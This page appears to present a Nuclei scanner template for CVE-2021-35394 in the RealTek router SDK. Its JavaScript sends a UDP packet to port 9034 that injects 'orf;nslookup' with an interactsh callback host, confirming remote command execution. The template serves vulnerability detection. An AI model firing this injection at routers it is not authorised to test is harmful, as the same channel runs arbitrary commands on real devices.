RealTek AP Router SDK - Arbitrary Command Injection

ID: CVE-2021-35394

Severity: critical

Author: king-alexander

Tags: cve,cve2021,realtek,rce,kev

Description

The SDK exposes a UDP server that allows remote execution of arbitray commands.

YAML Source

id: CVE-2021-35394

info:
  name: RealTek AP Router SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  remediation: Apply the latest security patches or updates provided by RealTek.
  description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
  tags: cve,cve2021,realtek,rce,kev

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      let message = `orf;nslookup ${OAST}`
      let data = message;
      packet.WriteString(data)
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());

    args:
      Host: "{{Host}}"
      Port: 9034
      OAST: "{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a0046304402202653f3caae379b8d6253e7b31c2627077a285c4345b3ebbb678cd447fd7b398f022041cb6f9a7593d51271e193d8fd866e6d948bc7b3f88115b07c5b12dceeb158d6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "javascript/cves/2021/CVE-2021-35394.yaml"

View on Github